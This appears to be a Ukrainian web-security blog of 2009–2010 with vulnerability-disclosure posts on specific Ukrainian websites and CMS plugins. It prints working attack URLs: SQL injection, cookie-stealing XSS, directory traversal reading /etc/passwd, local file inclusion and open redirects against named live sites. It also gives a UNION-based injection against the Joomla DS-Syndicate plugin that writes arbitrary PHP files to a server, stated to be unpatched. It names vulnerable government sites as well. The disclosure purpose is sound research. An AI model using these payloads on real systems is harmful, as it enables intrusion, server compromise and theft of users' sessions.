Websecurity - Веб безпека

15.03.2010

У вересні, 17.09.2009, я знайшов SQL Injection уразливість в ArtDesign CMS (це українська комерційна CMS). Дану уразливість я виявив на fitofarm.ua, де використовується даний движок. Про що найближчим часом повідомлю розробникам.

Детальна інформація про уразливість з’явиться пізніше. Спочатку повідомлю розробникам системи.

28.05.2010

SQL Injection:

http://site/news.php?ch=id&id=-1′%20or%20version()=5/*

Нещодавно я писав про DoS в Firefox, Internet Explorer, Chrome, Opera та інших браузерах. Тоді я писав про атаку через iframe з mailto: URL, яку я назвав DoS через емайл (DoS via email). Після чого я продовжив свої дослідження і виявив багато нових уразливостей в браузерах, які я назвав загальною назвою DoS через обробники протоколів (DoS via protocol handlers), до яких відноситься й попередня DoS атака через обробник mailto. І про які я повідомлю в серії своїх записів.

Зараз повідомляю про DoS в різних браузерах через протоколи news і nntp. Вчора, 26.05.2010, я виявив Denial of Service уразливості в Mozilla Firefox, Internet Explorer, Google Chrome та Opera.

Вони відноситься до типу блокуючих DoS та DoS через споживання ресурсів. Дані атаки можна провести як з використанням JS, так і без нього (створивши сторінку з великою кількістю iframe).

DoS:

Firefox, IE, Chrome & Opera DoS Exploit2.html

Даний експлоіт для протокола news працює в Mozilla Firefox 3.0.19 (і окрім попередніх версій, він повинен працювати в 3.5.x та 3.6.x), Internet Explorer 6 (6.0.2900.2180), Internet Explorer 8 (8.0.7600.16385), Google Chrome 1.0.154.48 та Opera 9.52.

У всіх зазначених браузерах відбувається блокування та перенавантаження системи від запуску Opera, який виступив в мене в якості news-клієнта, а IE8 взагалі вибиває (на комп’ютері без Opera). А в Opera атака відбувається без блокування, лише споживання ресурсів (більш повільне ніж в інших браузерах).

Firefox, IE & Opera DoS Exploit.html

Даний експлоіт для протокола nntp працює в Mozilla Firefox 3.0.19 (і окрім попередніх версій, він повинен працювати в 3.5.x та 3.6.x), Internet Explorer 6 (6.0.2900.2180) та Opera 9.52.

У всіх зазначених браузерах відбувається блокування та перенавантаження системи від запуску Opera, який виступив в мене в якості nntp-клієнта. В IE8 атака не спрацювала - мабуть із-за того, що на тому комп’ютері не було nntp-клієнта, зокрема Opera. А в Opera атака відбувається без блокування, лише споживання ресурсів (більш повільне ніж в інших браузерах).

В даній добірці уразливості в веб додатках:

• XM Easy Personal FTP Server Multiple DoS vulnerabilities (деталі)
• a xss on “action” parameter in BBSMAX (деталі)
• i found a xss on “page” parameter in “eccredit.php” in Dvbbs < 8.3.0 (деталі)
• SQL injection vulnerability in wILD CMS (деталі)
• Croogo CMS 1.2 Cross Site Scripting Vulnerabilities (деталі)
• New typo3-src packages fix several vulnerabilities (деталі)
• a xss on “threadid” parameter in BBSMAX (деталі)
• Employee Timeclock Software SQL Injection Vulnerabilities (деталі)
• Nortel Contact Center Manager Server Password Disclosure Vulnerability (деталі)
• Nortel Contact Center Manager Server Authentication Bypass Vulnerability (деталі)

23.11.2009

У березні, 13.03.2009, я знайшов Full path disclosure, Cross-Site Scripting, Directory Traversal, Local File Inclusion та Redirector уразливості на сайті http://plus.qbn.com.ua. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

26.05.2010

Full path disclosure:

http://plus.qbn.com.ua/www/delivery/fc.php?MAX_type=1

XSS:

http://plus.qbn.com.ua/www/delivery/fc.php?MAX_type=%3CBODY%20onload=alert(document.cookie)%3E

Directory Traversal:

http://plus.qbn.com.ua/www/delivery/fc.php?MAX_type=../../../../../../../etc/passwd%00

Local File Inclusion:

http://plus.qbn.com.ua/www/delivery/fc.php?MAX_type=../file.php

Redirector:

http://plus.qbn.com.ua/www/delivery/ck.php?dest=http://websecurity.com.ua
http://plus.qbn.com.ua/adclick.php?maxdest=http://websecurity.com.ua
http://plus.qbn.com.ua/adclick.php?dest=http://websecurity.com.ua

Дані уразливості вже виправлені (за рахунок оновлення движка). Окрім Redirector уразливостей, також відомих як URL Redirector Abuse (в WASC TC v2).

Як я вже розповідав, я прийняв участь у проекті Vulnerable Sites Database. І до раніше відправлених їм дірявих сайтів, я вже відправив нові.

Нещодавно я відправив в БД даного проекту 10 сайтів. З них 5 старих дірявих сайтів, про які я вже писав в новинах раніше, та 5 нових уразливих сайтів.

Це діряві gov-сайти: administracja.mswia.gov.pl, www.rstf.tas.gov.au, www.spa.ga.gov, www.nss.gov.qa, www.metropol.gov.co.

В даній добірці уразливості в веб додатках:

• Management User Authentication Bypass Vulnerability When Using Public Key Based SSH Authentication (Aruba) (деталі)
• 1024CMS Blind SQL Injection Vulnerability (деталі)
• Explay CMS <= 2.1 SQL Injection Vulnerabilities (деталі)
• Open redirection vulnerability in the Drupal API function drupal_goto (Drupal 6.15 and 5.21) (деталі)
• Kandidat CMS versions 1.3.1 Cross Site Scripting Vulnerability (деталі)
• Friendly-Tech FriendlyTR69 CPE Remote Management V2.8.9 SQL Injection Vulnerability (деталі)
• Security Notice for CA SiteMinder (деталі)
• [xss] a xss on “ThreadID” parameter in BBSXP 2008 from china (деталі)
• SQL injection vulnerability in Natychmiast CMS (деталі)
• Rittal CMC-TC Processing Unit II multiple vulnerabilities (деталі)

21.11.2009

У березні, 13.03.2009, я знайшов Full path disclosure, Cross-Site Scripting, Directory Traversal, Local File Inclusion та Redirector уразливості на сайті http://qwert.com.ua. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливості з’явиться пізніше.

24.05.2010

Full path disclosure:

http://qwert.com.ua/openx/www/delivery/fc.php?MAX_type=1

XSS:

http://qwert.com.ua/openx/www/delivery/fc.php?MAX_type=%3CBODY%20onload=alert(document.cookie)%3E

Directory Traversal:

http://qwert.com.ua/openx/www/delivery/fc.php?MAX_type=../../../../../../../etc/passwd%00

Local File Inclusion:

http://qwert.com.ua/openx/www/delivery/fc.php?MAX_type=../file.php

Redirector:

http://qwert.com.ua/openx/www/delivery/ck.php?dest=http://websecurity.com.ua
http://qwert.com.ua/openx/adclick.php?maxdest=http://websecurity.com.ua
http://qwert.com.ua/openx/adclick.php?dest=http://websecurity.com.ua

Дані уразливості вже виправлені (за рахунок оновлення движка). Окрім Redirector уразливостей, також відомих як URL Redirector Abuse (в WASC TC v2).

Сьогодні я знайшов нові уразливості в плагіні DS-Syndicate для Joomla - це Full path disclosure, Cross-Site Scripting та Directory Traversal уразливості. Дірки виявив на одному веб сайті, що використовує даний плагін. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в DS-Syndicate для Joomla.

Full path disclosure:

http://site/index2.php?option=ds-syndicate&version=1&feed_id=1%0A1

Хоча дана FPD має місце в тому самому скрипті і тому самому параметрі, але вона виводить трохи більше інформації ніж попередня FPD і проявляється не в одному, а одразу в двох скриптах. Тобто її потрібно виправляти окремо.

XSS (через SQLi + FPD):

http://site/index2.php?option=ds-syndicate&version=1&feed_id=-1+union+select+1,1,1,1,1,0x3C7363726970743E616C65727428646F63756D656E742E636F6F6B6965293C2F7363726970743E,1,1,1,1,1,1,1,1,1,1,1,1,1,1%0A%23

При XSS (через SQLi) код не виконується в браузері (бо виводиться xml), а при XSS (через SQLi + FPD) код виконується в браузері (бо виводиться html). Тільки через SQL Injection неможна провести XSS атаку, тому що код не виконується в браузері, а при використані разом SQLi та FPD можна провести XSS атаку.

Directory Traversal:

Для запису будь-яких файлів, зокрема PHP скриптів, а також для перезапису будь-яких файлів на сервері (при відключених magic quotes):

http://site/index2.php?option=ds-syndicate&version=1&feed_id=/../../../../1.php%00

Файл доступний: http://site/1.php

Для запису xml-файлів - для проведення XSS (через XML) та LFI атак, а також для перезапису будь-яких xml-файлів на сервері:

http://site/index2.php?option=ds-syndicate&version=1&feed_id=/../../../../1

Файл доступний: http://site/1.xml

Для запису PHP скриптів та інших файлів, а також для проведення XSS та LFI атак потрібно використати один з параметрів 2, 3, 6 або 18 SQL запиту.

http://site/index2.php?option=ds-syndicate&version=1&feed_id=-1+union+select+1,0x436F6465,0x436F6465,1,1,0x436F6465,1,1,1,1,1,1,1,1,1,1,1,0x436F6465,1,1%23/../../../../1

Вразливі всі версії DS-Syndicate для Joomla. Зазначу, що розробник плагіна більше його не підтримує, тому користувачам плагіна потрібно виправити його самотужки.

В даній добірці уразливості в веб додатках:

• EMC Control Center SAN Manager SST_SENDFILE Remote File Retrieval Vulnerability (деталі)
• EMC Control Center SAN Manager Master SST_CTGTRANS Overflow Vulnerability (деталі)
• ARISg5 (version 5.0) cross site scripting vulnerability (деталі)
• Oracle Siebel 7.x CRM Cross Site Scripting Vulnerability (деталі)
• ARISg5 (Version 5.0) Cross Site Scripting Vulnerability (деталі)
• Sparta Systems TrackWise TeamAccess module Multiple Cross Site Scripting Vulnerabilities (деталі)
• [xss] i found a Cross Site Scripting Vulnerability about Discuz! ‘uid’ Parameter (деталі)
• Eshbel Priority MarketGate module Cross Site Scripting Vulnerability (деталі)
• Symantec Veritas Storage Foundation Memory Disclosure Vulnerability (деталі)
• Symantec Veritas Storage Foundation Arbitrary File Read Vulnerability (деталі)

У жовтні, 22.10.2009, я знайшов Information Leakage уразливість на сайті http://kpi.ua. З якої в тому числі можна дізнатися про численні уразливості, що мали місце на даному сайті тривалий час.

Про уразливі, взломані та інфіковані КПІ-шні сайти я писав багато разів за 2008-2010 роки. Навіть писав про інфекцію на kpi.ua, що була виявлена 12.12.2009. Останній раз я писав про уразливості на codecamp.org.ua - сайті організаторів конференції CodeCamp, що проводилася минулого і цього року в КПІ.

Ситуація на http://kpi.ua не краща. Що видно з Information Leakage уразливості на даному сайті.

Information Leakage:

http://kpi.ua/CHANGELOG.txt

Прочитавши перелік виправлених дірок в Друпалі, ви можете дізнатися про численні уразливості, що тривалий час мали місце на даному сайті. Зокрема в жовтні вони використовували Drupal 5.19. Можете подивитися скільки дірок було виправлено за цей час в Drupal до тієї версії, що зараз використовується на сайті. І при цьому врахуйте, що КПІ проводить конференцію про інформаційну безпеку CodeCamp. При цьому забуваючи, як і самі організатори конференції, про безпеку власних сайтів.